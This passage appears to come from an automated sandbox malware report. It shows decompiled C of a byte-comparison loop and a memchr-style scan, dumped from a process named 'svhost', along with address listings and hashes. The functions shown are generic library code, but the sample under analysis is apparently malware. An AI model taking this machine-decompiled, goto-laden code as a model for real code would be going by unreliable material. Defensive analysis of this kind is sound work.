                                      							__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L280;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x1d) & 0x000000ff;
                                      							__eax =  *(__edx - 0x1d) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 0x1c) & 0x000000ff;
                                      								__eax =  *(__edx - 0x1c) & 0x000000ff;
                                      								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L284;
                                      							}
                                      							goto L280;
                                      					}
                                      				} else {
                                      					goto L6;
                                      				}
                                      				do {
                                      					L6:
                                      					_t756 =  *_t941;
                                      					if(_t756 ==  *_t871) {
                                      						_t820 = 0;
                                      						__eflags = 0;
                                      						L14:
                                      						if(_t820 != 0) {
                                      							goto L145;
                                      						}
                                      						_t757 = _t941[4];
                                      						_t19 =  &(_t871[4]); // 0xfc0850c
                                      						if(_t757 ==  *_t19) {
                                      							_t820 = 0;
                                      							__eflags = 0;
                                      							L23:
                                      							if(_t820 != 0) {
                                      								goto L145;
                                      							}
                                      							_t758 = _t941[8];
                                      							_t36 =  &(_t871[8]); // 0x6ebc194
                                      							if(_t758 ==  *_t36) {
                                      								_t820 = 0;
                                      								__eflags = 0;
                                      								L32:
                                      								if(_t820 != 0) {
                                      									goto L145;
                                      								}
                                      								_t759 = _t941[0xc];
                                      								_t53 =  &(_t871[0xc]); // 0xfd448d8b
                                      								if(_t759 ==  *_t53) {
                                      									_t820 = 0;
                                      									__eflags = 0;
                                      									L41:
                                      									if(_t820 != 0) {
                                      										goto L145;
                                      									}
                                      									_t70 =  &(_t871[0x10]); // 0x4e89ffff
                                      									if(_t941[0x10] ==  *_t70) {
                                      										_t820 = 0;
                                      										__eflags = 0;
                                      										L50:
                                      										if(_t820 != 0) {
                                      											goto L145;
                                      										}
                                      										_t761 = _t941[0x14];
                                      										_t88 =  &(_t871[0x14]); // 0x8478b04
                                      										if(_t761 ==  *_t88) {
                                      											_t820 = 0;
                                      											__eflags = 0;
                                      											L59:
                                      											if(_t820 != 0) {
                                      												goto L145;
                                      											}
                                      											_t762 = _t941[0x18];
                                      											_t105 =  &(_t871[0x18]); // 0x468b0689
                                      											if(_t762 ==  *_t105) {
                                      												_t820 = 0;
                                      												__eflags = 0;
                                      												L68:
                                      												if(_t820 != 0) {
                                      													goto L145;
                                      												}
                                      												_t763 = _t941[0x1c];
                                      												_t122 =  &(_t871[0x1c]); // 0x18478904
                                      												if(_t763 ==  *_t122) {
                                      													_t820 = 0;
                                      													__eflags = 0;
                                      													L77:
                                      													if(_t820 != 0) {
                                      														goto L145;
                                      													}
                                      													goto L78;
                                      												}
                                      												_t123 =  &(_t871[0x1c]); // 0x18478904
                                      												_t918 = (_t763 & 0x000000ff) - ( *_t123 & 0x000000ff);
                                      												if(_t918 != 0) {
                                      													L73:
                                      													_t820 = (0 | _t918 > 0x00000000) * 2 - 1;
                                      													goto L77;
                                      												}
                                      												_t125 =  &(_t871[0x1d]); // 0xeb184789
                                      												_t918 = (_t941[0x1d] & 0x000000ff) - ( *_t125 & 0x000000ff);
                                      												if(_t918 != 0) {
                                      													goto L73;
                                      												}
                                      												_t127 =  &(_t871[0x1e]); // 0x1eeb1847
                                      												_t918 = (_t941[0x1e] & 0x000000ff) - ( *_t127 & 0x000000ff);
                                      												if(_t918 == 0) {
                                      													_t133 =  &(_t871[0x1f]); // 0x831eeb18
                                      													_t820 = (_t941[0x1f] & 0x000000ff) - ( *_t133 & 0x000000ff);
                                      													__eflags = _t820;
                                      													if(_t820 != 0) {
                                      														__eflags = _t820;
                                      														_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
                                      													}
                                      													goto L77;
                                      												}
                                      												goto L73;
                                      											}
                                      											_t106 =  &(_t871[0x18]); // 0x468b0689
                                      											_t916 = (_t762 & 0x000000ff) - ( *_t106 & 0x000000ff);
                                      											if(_t916 != 0) {
                                      												L64:
                                      												_t820 = (0 | _t916 > 0x00000000) * 2 - 1;
                                      												goto L68;
                                      											}
                                      											_t108 =  &(_t871[0x19]); // 0x4468b06
                                      											_t916 = (_t941[0x19] & 0x000000ff) - ( *_t108 & 0x000000ff);
                                      											if(_t916 != 0) {
                                      												goto L64;
                                      											}
                                      											_t110 =  &(_t871[0x1a]); // 0x8904468b
                                      											_t916 = (_t941[0x1a] & 0x000000ff) - ( *_t110 & 0x000000ff);
                                      											if(_t916 == 0) {
                                      												_t116 =  &(_t871[0x1b]); // 0x47890446
                                      												_t820 = (_t941[0x1b] & 0x000000ff) - ( *_t116 & 0x000000ff);
                                      												__eflags = _t820;
                                      												if(_t820 != 0) {
                                      													__eflags = _t820;
                                      													_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
                                      												}
                                      												goto L68;
                                      											}
                                      											goto L64;
                                      										}
                                      										_t89 =  &(_t871[0x14]); // 0x8478b04
                                      										_t914 = (_t761 & 0x000000ff) - ( *_t89 & 0x000000ff);
                                      										if(_t914 != 0) {
                                      											L55:
                                      											_t820 = (0 | _t914 > 0x00000000) * 2 - 1;
                                      											goto L59;
                                      										}
                                      										_t91 =  &(_t871[0x15]); // 0x8908478b
                                      										_t914 = (_t941[0x15] & 0x000000ff) - ( *_t91 & 0x000000ff);
                                      										if(_t914 != 0) {
                                      											goto L55;
                                      										}
                                      										_t93 =  &(_t871[0x16]); // 0x6890847
                                      										_t914 = (_t941[0x16] & 0x000000ff) - ( *_t93 & 0x000000ff);
                                      										if(_t914 == 0) {
                                      											_t99 =  &(_t871[0x17]); // 0x8b068908
                                      											_t820 = (_t941[0x17] & 0x000000ff) - ( *_t99 & 0x000000ff);
                                      											__eflags = _t820;
                                      											if(_t820 != 0) {
                                      												__eflags = _t820;
                                      												_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
                                      											}
                                      											goto L59;
                                      										}
                                      										goto L55;
                                      									}
                                      									_t71 =  &(_t871[0x10]); // 0x4e89ffff
                                      									_t912 = (_t941[0x10] & 0x000000ff) - ( *_t71 & 0x000000ff);
                                      									if(_t912 != 0) {
                                      										L46:
                                      										_t820 = (0 | _t912 > 0x00000000) * 2 - 1;
                                      										goto L50;
                                      									}
                                      									_t74 =  &(_t871[0x11]); // 0x44e89ff
                                      									_t912 = (_t941[0x11] & 0x000000ff) - ( *_t74 & 0x000000ff);
                                      									if(_t912 != 0) {
                                      										goto L46;
                                      									}
                                      									_t76 =  &(_t871[0x12]); // 0x8b044e89
                                      									_t912 = (_t941[0x12] & 0x000000ff) - ( *_t76 & 0x000000ff);
                                      									if(_t912 == 0) {
                                      										_t82 =  &(_t871[0x13]); // 0x478b044e
                                      										_t820 = (_t941[0x13] & 0x000000ff) - ( *_t82 & 0x000000ff);
                                      										__eflags = _t820;
                                      										if(_t820 != 0) {
                                      											__eflags = _t820;
                                      											_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
                                      										}
                                      										goto L50;
                                      									}
                                      									goto L46;
                                      								}
                                      								_t54 =  &(_t871[0xc]); // 0xfd448d8b
                                      								_t910 = (_t759 & 0x000000ff) - ( *_t54 & 0x000000ff);
                                      								if(_t910 != 0) {
                                      									L37:
                                      									_t820 = (0 | _t910 > 0x00000000) * 2 - 1;
                                      									goto L41;
                                      								}
                                      								_t56 =  &(_t871[0xd]); // 0xfffd448d
                                      								_t910 = (_t941[0xd] & 0x000000ff) - ( *_t56 & 0x000000ff);
                                      								if(_t910 != 0) {
                                      									goto L37;
                                      								}
                                      								_t58 =  &(_t871[0xe]); // 0xfffffd44
                                      								_t910 = (_t941[0xe] & 0x000000ff) - ( *_t58 & 0x000000ff);
                                      								if(_t910 == 0) {
                                      									_t64 =  &(_t871[0xf]); // 0x89fffffd
                                      									_t820 = (_t941[0xf] & 0x000000ff) - ( *_t64 & 0x000000ff);
                                      									__eflags = _t820;
                                      									if(_t820 != 0) {
                                      										__eflags = _t820;
                                      										_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
                                      									}
                                      									goto L41;
                                      								}
                                      								goto L37;
                                      							}
                                      							_t37 =  &(_t871[8]); // 0x6ebc194
                                      							_t908 = (_t758 & 0x000000ff) - ( *_t37 & 0x000000ff);
                                      							if(_t908 != 0) {
                                      								L28:
                                      								_t820 = (0 | _t908 > 0x00000000) * 2 - 1;
                                      								goto L32;
                                      							}
                                      							_t39 =  &(_t871[9]); // 0x8b06ebc1
                                      							_t908 = (_t941[9] & 0x000000ff) - ( *_t39 & 0x000000ff);
                                      							if(_t908 != 0) {
                                      								goto L28;
                                      							}
                                      							_t41 =  &(_t871[0xa]); // 0x8d8b06eb
                                      							_t908 = (_t941[0xa] & 0x000000ff) - ( *_t41 & 0x000000ff);
                                      							if(_t908 == 0) {
                                      								_t47 =  &(_t871[0xb]); // 0x448d8b06
                                      								_t820 = (_t941[0xb] & 0x000000ff) - ( *_t47 & 0x000000ff);
                                      								__eflags = _t820;
                                      								if(_t820 != 0) {
                                      									__eflags = _t820;
                                      									_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
                                      								}
                                      								goto L32;
                                      							}
                                      							goto L28;
                                      						}
                                      						_t20 =  &(_t871[4]); // 0xfc0850c
                                      						_t906 = (_t757 & 0x000000ff) - ( *_t20 & 0x000000ff);
                                      						if(_t906 != 0) {
                                      							L19:
                                      							_t820 = (0 | _t906 > 0x00000000) * 2 - 1;
                                      							goto L23;
                                      						}
                                      						_t22 =  &(_t871[5]); // 0x940fc085
                                      						_t906 = (_t941[5] & 0x000000ff) - ( *_t22 & 0x000000ff);
                                      						if(_t906 != 0) {
                                      							goto L19;
                                      						}
                                      						_t24 =  &(_t871[6]); // 0xc1940fc0
                                      						_t906 = (_t941[6] & 0x000000ff) - ( *_t24 & 0x000000ff);
                                      						if(_t906 == 0) {
                                      							_t30 =  &(_t871[7]); // 0xebc1940f
                                      							_t820 = (_t941[7] & 0x000000ff) - ( *_t30 & 0x000000ff);
                                      							__eflags = _t820;
                                      							if(_t820 != 0) {
                                      								__eflags = _t820;
                                      								_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
                                      							}
                                      							goto L23;
                                      						}
                                      						goto L19;
                                      					}
                                      					_t904 = (_t756 & 0x000000ff) - ( *_t871 & 0x000000ff);
                                      					if(_t904 != 0) {
                                      						L10:
                                      						_t820 = (0 | _t904 > 0x00000000) * 2 - 1;
                                      						goto L14;
                                      					}
                                      					_t5 =  &(_t871[1]); // 0xcc483c9
                                      					_t904 = (_t941[1] & 0x000000ff) - ( *_t5 & 0x000000ff);
                                      					if(_t904 != 0) {
                                      						goto L10;
                                      					}
                                      					_t7 =  &(_t871[2]); // 0x850cc483
                                      					_t904 = (_t941[2] & 0x000000ff) - ( *_t7 & 0x000000ff);
                                      					if(_t904 == 0) {
                                      						_t13 =  &(_t871[3]); // 0xc0850cc4
                                      						_t820 = (_t941[3] & 0x000000ff) - ( *_t13 & 0x000000ff);
                                      						__eflags = _t820;
                                      						if(_t820 != 0) {
                                      							__eflags = _t820;
                                      							_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
                                      						}
                                      						goto L14;
                                      					}
                                      					goto L10;
                                      					L78:
                                      					_t842 = 0x20;
                                      					_t812 = _t812 - _t842;
                                      					_t941 =  &(_t941[_t842]);
                                      					_t871 =  &(_t871[_t842]);
                                      				} while (_t812 >= _t842);
                                      				goto L79;
                                      			}
                                      0x00000000
                                      0x00000000
                                      0x00ea224d
                                      0x00ea2250
                                      0x00ea2254
                                      0x00ea2258
                                      0x00ea2258
                                      0x00ea225a
                                      0x00ea226c
                                      0x00ea226f
                                      0x00ea2273
                                      0x00ea2277
                                      0x00ea2277
                                      0x00ea2279
                                      0x00ea227b
                                      0x00ea227d
                                      0x00ea227f
                                      0x00ea2282
                                      0x00ea2282
                                      0x00000000
                                      0x00ea2279
                                      0x00000000
                                      0x00000000
                                      0x00ea254f
                                      0x00ea254f
                                      0x00ea2552
                                      0x00ea2555
                                      0x00ea25b3
                                      0x00ea25b3
                                      0x00ea25b5
                                      0x00ea25b5
                                      0x00ea25b7
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea25b7
                                      0x00ea2557
                                      0x00ea255a
                                      0x00ea255e
                                      0x00ea2562
                                      0x00ea2562
                                      0x00ea2564
                                      0x00ea2584
                                      0x00ea2584
                                      0x00ea2586
                                      0x00ea2588
                                      0x00ea258b
                                      0x00000000
                                      0x00ea258b
                                      0x00ea2566
                                      0x00ea2569
                                      0x00ea256d
                                      0x00ea2571
                                      0x00ea2571
                                      0x00ea2573
                                      0x00000000
                                      0x00000000
                                      0x00ea2575
                                      0x00ea2578
                                      0x00ea257c
                                      0x00ea2580
                                      0x00ea2580
                                      0x00ea2582
                                      0x00ea2594
                                      0x00ea2597
                                      0x00ea259b
                                      0x00ea259f
                                      0x00ea259f
                                      0x00ea25a1
                                      0x00ea25a3
                                      0x00ea25a5
                                      0x00ea25a7
                                      0x00ea25aa
                                      0x00ea25aa
                                      0x00000000
                                      0x00ea25a1
                                      0x00000000
                                      0x00000000
                                      0x00ea2864
                                      0x00ea2864
                                      0x00ea2867
                                      0x00ea286a
                                      0x00ea28c8
                                      0x00ea28c8
                                      0x00ea28ca
                                      0x00ea28ca
                                      0x00ea28cc
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea28cc
                                      0x00ea286c
                                      0x00ea286f
                                      0x00ea2873
                                      0x00ea2877
                                      0x00ea2877
                                      0x00ea2879
                                      0x00ea2899
                                      0x00ea2899
                                      0x00ea289b
                                      0x00ea289d
                                      0x00ea28a0
                                      0x00000000
                                      0x00ea28a0
                                      0x00ea287b
                                      0x00ea287e
                                      0x00ea2882
                                      0x00ea2886
                                      0x00ea2886
                                      0x00ea2888
                                      0x00000000
                                      0x00000000
                                      0x00ea288a
                                      0x00ea288d
                                      0x00ea2891
                                      0x00ea2895
                                      0x00ea2895
                                      0x00ea2897
                                      0x00ea28a9
                                      0x00ea28ac
                                      0x00ea28b0
                                      0x00ea28b4
                                      0x00ea28b4
                                      0x00ea28b6
                                      0x00ea28b8
                                      0x00ea28ba
                                      0x00ea28bc
                                      0x00ea28bf
                                      0x00ea28bf
                                      0x00000000
                                      0x00ea28b6
                                      0x00000000
                                      0x00000000
                                      0x00ea1eb9
                                      0x00ea1ebf
                                      0x00ea1f1d
                                      0x00ea1f1d
                                      0x00ea1f1f
                                      0x00ea1f21
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea1f21
                                      0x00ea1ec1
                                      0x00ea1ecc
                                      0x00ea1ece
                                      0x00ea1eee
                                      0x00ea1ef5
                                      0x00000000
                                      0x00ea1ef5
                                      0x00ea1ed0
                                      0x00ea1edb
                                      0x00ea1edd
                                      0x00000000
                                      0x00000000
                                      0x00ea1edf
                                      0x00ea1eea
                                      0x00ea1eec
                                      0x00ea1efe
                                      0x00ea1f09
                                      0x00ea1f09
                                      0x00ea1f0b
                                      0x00ea1f0f
                                      0x00ea1f14
                                      0x00ea1f14
                                      0x00000000
                                      0x00ea1f0b
                                      0x00000000
                                      0x00000000
                                      0x00ea21b9
                                      0x00ea21b9
                                      0x00ea21bc
                                      0x00ea21bf
                                      0x00ea221d
                                      0x00ea221d
                                      0x00ea221f
                                      0x00ea221f
                                      0x00ea2221
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea2221
                                      0x00ea21c1
                                      0x00ea21c4
                                      0x00ea21c8
                                      0x00ea21cc
                                      0x00ea21cc
                                      0x00ea21ce
                                      0x00ea21ee
                                      0x00ea21ee
                                      0x00ea21f0
                                      0x00ea21f2
                                      0x00ea21f5
                                      0x00000000
                                      0x00ea21f5
                                      0x00ea21d0
                                      0x00ea21d3
                                      0x00ea21d7
                                      0x00ea21db
                                      0x00ea21db
                                      0x00ea21dd
                                      0x00000000
                                      0x00000000
                                      0x00ea21df
                                      0x00ea21e2
                                      0x00ea21e6
                                      0x00ea21ea
                                      0x00ea21ea
                                      0x00ea21ec
                                      0x00ea21fe
                                      0x00ea2201
                                      0x00ea2205
                                      0x00ea2209
                                      0x00ea2209
                                      0x00ea220b
                                      0x00ea220d
                                      0x00ea220f
                                      0x00ea2211
                                      0x00ea2214
                                      0x00ea2214
                                      0x00000000
                                      0x00ea220b
                                      0x00000000
                                      0x00000000
                                      0x00ea24e1
                                      0x00ea24e1
                                      0x00ea24e4
                                      0x00ea24e7
                                      0x00ea2545
                                      0x00ea2545
                                      0x00ea2547
                                      0x00ea2547
                                      0x00ea2549
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea2549
                                      0x00ea24e9
                                      0x00ea24ec
                                      0x00ea24f0
                                      0x00ea24f4
                                      0x00ea24f4
                                      0x00ea24f6
                                      0x00ea2516
                                      0x00ea2516
                                      0x00ea2518
                                      0x00ea251a
                                      0x00ea251d
                                      0x00000000
                                      0x00ea251d
                                      0x00ea24f8
                                      0x00ea24fb
                                      0x00ea24ff
                                      0x00ea2503
                                      0x00ea2503
                                      0x00ea2505
                                      0x00000000
                                      0x00000000
                                      0x00ea2507
                                      0x00ea250a
                                      0x00ea250e
                                      0x00ea2512
                                      0x00ea2512
                                      0x00ea2514
                                      0x00ea2526
                                      0x00ea2529
                                      0x00ea252d
                                      0x00ea2531
                                      0x00ea2531
                                      0x00ea2533
                                      0x00ea2535
                                      0x00ea2537
                                      0x00ea2539
                                      0x00ea253c
                                      0x00ea253c
                                      0x00000000
                                      0x00ea2533
                                      0x00000000
                                      0x00000000
                                      0x00ea27f6
                                      0x00ea27f6
                                      0x00ea27f9
                                      0x00ea27fc
                                      0x00ea285a
                                      0x00ea285a
                                      0x00ea285c
                                      0x00ea285c
                                      0x00ea285e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea285e
                                      0x00ea27fe
                                      0x00ea2801
                                      0x00ea2805
                                      0x00ea2809
                                      0x00ea2809
                                      0x00ea280b
                                      0x00ea282b
                                      0x00ea282b
                                      0x00ea282d
                                      0x00ea282f
                                      0x00ea2832
                                      0x00000000
                                      0x00ea2832
                                      0x00ea280d
                                      0x00ea2810
                                      0x00ea2814
                                      0x00ea2818
                                      0x00ea2818
                                      0x00ea281a
                                      0x00000000
                                      0x00000000
                                      0x00ea281c
                                      0x00ea281f
                                      0x00ea2823
                                      0x00ea2827
                                      0x00ea2827
                                      0x00ea2829
                                      0x00ea283b
                                      0x00ea283e
                                      0x00ea2842
                                      0x00ea2846
                                      0x00ea2846
                                      0x00ea2848
                                      0x00ea284a
                                      0x00ea284c
                                      0x00ea284e
                                      0x00ea2851
                                      0x00ea2851
                                      0x00000000
                                      0x00ea2848
                                      0x00000000
                                      0x00000000
                                      0x00ea1e4b
                                      0x00ea1e51
                                      0x00ea1eaf
                                      0x00ea1eaf
                                      0x00ea1eb1
                                      0x00ea1eb3
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea1eb3
                                      0x00ea1e53
                                      0x00ea1e5e
                                      0x00ea1e60
                                      0x00ea1e80
                                      0x00ea1e87
                                      0x00000000
                                      0x00ea1e87
                                      0x00ea1e62
                                      0x00ea1e6d
                                      0x00ea1e6f
                                      0x00000000
                                      0x00000000
                                      0x00ea1e71
                                      0x00ea1e7c
                                      0x00ea1e7e
                                      0x00ea1e90
                                      0x00ea1e9b
                                      0x00ea1e9b
                                      0x00ea1e9d
                                      0x00ea1ea1
                                      0x00ea1ea6
                                      0x00ea1ea6
                                      0x00000000
                                      0x00ea1e9d
                                      0x00000000
                                      0x00000000
                                      0x00ea214b
                                      0x00ea214b
                                      0x00ea214e
                                      0x00ea2151
                                      0x00ea21af
                                      0x00ea21af
                                      0x00ea21b1
                                      0x00ea21b1
                                      0x00ea21b3
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea21b3
                                      0x00ea2153
                                      0x00ea2156
                                      0x00ea215a
                                      0x00ea215e
                                      0x00ea215e
                                      0x00ea2160
                                      0x00ea2180
                                      0x00ea2180
                                      0x00ea2182
                                      0x00ea2184
                                      0x00ea2187
                                      0x00000000
                                      0x00ea2187
                                      0x00ea2162
                                      0x00ea2165
                                      0x00ea2169
                                      0x00ea216d
                                      0x00ea216d
                                      0x00ea216f
                                      0x00000000
                                      0x00000000
                                      0x00ea2171
                                      0x00ea2174
                                      0x00ea2178
                                      0x00ea217c
                                      0x00ea217c
                                      0x00ea217e
                                      0x00ea2190
                                      0x00ea2193
                                      0x00ea2197
                                      0x00ea219b
                                      0x00ea219b
                                      0x00ea219d
                                      0x00ea219f
                                      0x00ea21a1
                                      0x00ea21a3
                                      0x00ea21a6
                                      0x00ea21a6
                                      0x00000000
                                      0x00ea219d
                                      0x00000000
                                      0x00000000
                                      0x00ea2473
                                      0x00ea2473
                                      0x00ea2476
                                      0x00ea2479
                                      0x00ea24d7
                                      0x00ea24d7
                                      0x00ea24d9
                                      0x00ea24d9
                                      0x00ea24db
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea24db
                                      0x00ea247b
                                      0x00ea247e
                                      0x00ea2482
                                      0x00ea2486
                                      0x00ea2486
                                      0x00ea2488
                                      0x00ea24a8
                                      0x00ea24a8
                                      0x00ea24aa
                                      0x00ea24ac
                                      0x00ea24af
                                      0x00000000
                                      0x00ea24af
                                      0x00ea248a
                                      0x00ea248d
                                      0x00ea2491
                                      0x00ea2495
                                      0x00ea2495
                                      0x00ea2497
                                      0x00000000
                                      0x00000000
                                      0x00ea2499
                                      0x00ea249c
                                      0x00ea24a0
                                      0x00ea24a4
                                      0x00ea24a4
                                      0x00ea24a6
                                      0x00ea24b8
                                      0x00ea24bb
                                      0x00ea24bf
                                      0x00ea24c3
                                      0x00ea24c3
                                      0x00ea24c5
                                      0x00ea24c7
                                      0x00ea24c9
                                      0x00ea24cb
                                      0x00ea24ce
                                      0x00ea24ce
                                      0x00000000
                                      0x00ea24c5
                                      0x00000000
                                      0x00000000
                                      0x00ea2788
                                      0x00ea2788
                                      0x00ea278b
                                      0x00ea278e
                                      0x00ea27ec
                                      0x00ea27ec
                                      0x00ea27ee
                                      0x00ea27ee
                                      0x00ea27f0
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea27f0
                                      0x00ea2790
                                      0x00ea2793
                                      0x00ea2797
                                      0x00ea279b
                                      0x00ea279b
                                      0x00ea279d
                                      0x00ea27bd
                                      0x00ea27bd
                                      0x00ea27bf
                                      0x00ea27c1
                                      0x00ea27c4
                                      0x00000000
                                      0x00ea27c4
                                      0x00ea279f
                                      0x00ea27a2
                                      0x00ea27a6
                                      0x00ea27aa
                                      0x00ea27aa
                                      0x00ea27ac
                                      0x00000000
                                      0x00000000
                                      0x00ea27ae
                                      0x00ea27b1
                                      0x00ea27b5
                                      0x00ea27b9
                                      0x00ea27b9
                                      0x00ea27bb
                                      0x00ea27cd
                                      0x00ea27d0
                                      0x00ea27d4
                                      0x00ea27d8
                                      0x00ea27d8
                                      0x00ea27da
                                      0x00ea27dc
                                      0x00ea27de
                                      0x00ea27e0
                                      0x00ea27e3
                                      0x00ea27e3
                                      0x00000000
                                      0x00ea27da
                                      0x00000000
                                      0x00000000
                                      0x00ea1ddd
                                      0x00ea1de3
                                      0x00ea1e41
                                      0x00ea1e41
                                      0x00ea1e43
                                      0x00ea1e45
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea1e45
                                      0x00ea1de5
                                      0x00ea1df0
                                      0x00ea1df2
                                      0x00ea1e12
                                      0x00ea1e19
                                      0x00000000
                                      0x00ea1e19
                                      0x00ea1df4
                                      0x00ea1dff
                                      0x00ea1e01
                                      0x00000000
                                      0x00000000
                                      0x00ea1e03
                                      0x00ea1e0e
                                      0x00ea1e10
                                      0x00ea1e22
                                      0x00ea1e2d
                                      0x00ea1e2d
                                      0x00ea1e2f
                                      0x00ea1e33
                                      0x00ea1e38
                                      0x00ea1e38
                                      0x00000000
                                      0x00ea1e2f
                                      0x00000000
                                      0x00000000
                                      0x00ea20dd

Memory Dump Source
• Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b31277783dc15bedb63817f2d920fbbac499bb67de4b2c0808fbcef3c06afb69
                                      • Instruction ID: 914c2240863b43357c4ae4c7a7e2fc645f41c263fa61b814bb7278a9e74b1ca7
                                      • Opcode Fuzzy Hash: b31277783dc15bedb63817f2d920fbbac499bb67de4b2c0808fbcef3c06afb69
                                      • Instruction Fuzzy Hash: 0FD104322085A24ECB2D4A3D847007ABFE16A473A5B0E53DDD4F7EF5C2E924F954E660
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			/* memchr-style byte scan: _a4 = buffer, _a8 = byte to find, _a12 = byte count.
                                      			   Scans byte-wise until the pointer is 4-byte aligned, then tests a dword at a
                                      			   time using the 0x7efefeff / 0x81010100 "has zero byte" trick on (dword ^ pattern).
                                      			   Returns a pointer to the first matching byte, or 0 when the count runs out. */
                                      			E00EA1950(signed int _a4, signed char _a8, intOrPtr _a12) {
                                      				intOrPtr _t13;
                                      				void* _t14;
                                      				signed char _t20;
                                      				signed char _t24;
                                      				signed int _t27;
                                      				signed char _t32;
                                      				unsigned int _t33;
                                      				signed char _t35;
                                      				signed char _t37;
                                      				signed int _t39;
                                      
                                      				_t13 = _a12;
                                      				if(_t13 == 0) {
                                      					L11:
                                      					return _t13;
                                      				} else {
                                      					_t39 = _a4;
                                      					_t20 = _a8;
                                      					if((_t39 & 0x00000003) == 0) {
                                      						L5:
                                      						_t14 = _t13 - 4;
                                      						if(_t14 < 0) {
                                      							L8:
                                      							_t13 = _t14 + 4;
                                      							if(_t13 == 0) {
                                      								goto L11;
                                      							} else {
                                      								while(1) {
                                      									_t24 =  *_t39;
                                      									_t39 = _t39 + 1;
                                      									if((_t24 ^ _t20) == 0) {
                                      										goto L20;
                                      									}
                                      									_t13 = _t13 - 1;
                                      									if(_t13 != 0) {
                                      										continue;
                                      									} else {
                                      										goto L11;
                                      									}
                                      									goto L24;
                                      								}
                                      								goto L20;
                                      							}
                                      						} else {
                                      							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
                                      							do {
                                      								_t27 =  *_t39 ^ _t20;
                                      								_t39 = _t39 + 4;
                                      								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
                                      									goto L12;
                                      								} else {
                                      									_t32 =  *(_t39 - 4) ^ _t20;
                                      									if(_t32 == 0) {
                                      										return _t39 - 4;
                                      									} else {
                                      										_t33 = _t32 ^ _t20;
                                      										if(_t33 == 0) {
                                      											return _t39 - 3;
                                      										} else {
                                      											_t35 = _t33 >> 0x00000010 ^ _t20;
                                      											if(_t35 == 0) {
                                      												return _t39 - 2;
                                      											} else {
                                      												if((_t35 ^ _t20) == 0) {
                                      													goto L20;
                                      												} else {
                                      													goto L12;
                                      												}
                                      											}
                                      										}
                                      									}
                                      								}
                                      								goto L24;
                                      								L12:
                                      								_t14 = _t14 - 4;
                                      							} while (_t14 >= 0);
                                      							goto L8;
                                      						}
                                      					} else {
                                      						while(1) {
                                      							_t37 =  *_t39;
                                      							_t39 = _t39 + 1;
                                      							if((_t37 ^ _t20) == 0) {
                                      								break;
                                      							}
                                      							_t13 = _t13 - 1;
                                      							if(_t13 == 0) {
                                      								goto L11;
                                      							} else {
                                      								if((_t39 & 0x00000003) != 0) {
                                      									continue;
                                      								} else {
                                      									goto L5;
                                      								}
                                      							}
                                      							goto L24;
                                      						}
                                      						L20:
                                      						return _t39 - 1;
                                      					}
                                      				}
                                      				L24:
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
